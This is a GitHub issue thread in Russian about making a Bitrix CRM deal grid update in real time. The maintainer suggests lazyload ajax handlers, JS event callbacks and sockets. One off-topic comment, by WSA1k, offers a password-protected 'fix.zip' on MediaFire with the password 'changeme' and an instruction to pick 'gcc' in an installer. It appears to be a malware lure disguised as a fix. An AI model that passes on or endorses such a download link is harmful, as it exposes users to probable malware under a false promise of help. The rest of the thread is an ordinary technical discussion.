### ISSUE TITLE
Сделки не обновляются в реальном времени

### ISSUE THREAD

**Issue by jabir-sabitov** [sashazenit4/otus-learning#2]
https://github.com/sashazenit4/otus-learning/blob/3de7744ed76597232e2a215427b78a7b235688b4/local/components/aholin/deal.grid/class.php#L30

Здесь сделки обновляются только после перезагрузки компонента. Как можно сделать получение сделок в реальном времени? Т.е. чтобы изменился статус сделки - мы без перезагрузки сразу увидели какое-то движение на странице

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sashazenit4** [comment]
jabir-sabitov
Привет, можно добавить lazyload.ajax.php вроде того что используется в списке элементов смарт-процессов (компонент bitrix:crm.item.list) и вставлять данные с помощью джаваскриптового АПИ грида. Если нужно я допишу, но уже в среду. Завтра у меня день рождения)

**Comment by jabir-sabitov** [comment]
> jabir-sabitov Привет, можно добавить lazyload.ajax.php вроде того что используется в списке элементов смарт-процессов (компонент bitrix:crm.item.list) и вставлять данные с помощью джаваскриптового АПИ грида. Если нужно я допишу, но уже в среду. Завтра у меня день рождения)

С наступающим Днём рождения! 🥳

По задаче - имеется ввиду обновление информации о сделке по таймеру? А если нам нужно получать данные в реальном времени? Постоянно логнполлить сервер? Не возрастёт ли в таком случае многократно нагрузка на сервер?

**Comment by sashazenit4** [comment]
Да нет, JS события можно подключить и по ним слушать, вроди эти у дел в CRM
BX.Crm.Activity.Planner.Manager.setCallback('onAfterActivitySave', function()
{
    BX.Main.gridManager.reload('<?= CUtil::JSEscape($arResult['GRID_ID'])?>');
});

**Comment by jabir-sabitov** [comment]
> Да нет, JS события можно подключить и по ним слушать, вроди эти у дел в CRM BX.Crm.Activity.Planner.Manager.setCallback('onAfterActivitySave', function() { BX.Main.gridManager.reload(''); });

Не совсем понял, а что вызывает эти события? Сокет/ajax запрос?

**Comment by sashazenit4** [comment]
Сейчас в голову не приходит конкретный пример, но концептуально, если мы разрабатываем такую страницу, то использование сокета будет предпочтительным. Сокет позволит нам получать сообщения об изменениях сделки в реальном времени. В сообщении можно передать, например, только ID сделки. Это сообщение будет получено на клиенте, и JavaScript сможет обработать его, перезагрузив данные в гриде (сделав ajax или rest запрос)

**Comment by sashazenit4** [comment]
Концепция:
1. Вывели грид
2. Поставили обработчик входящего сокета, получили по нему id сделки
3. Сделали аякс запрос на обработчик в class.php или ajax.php
4. После выполнения запроса обновляем интерфейс
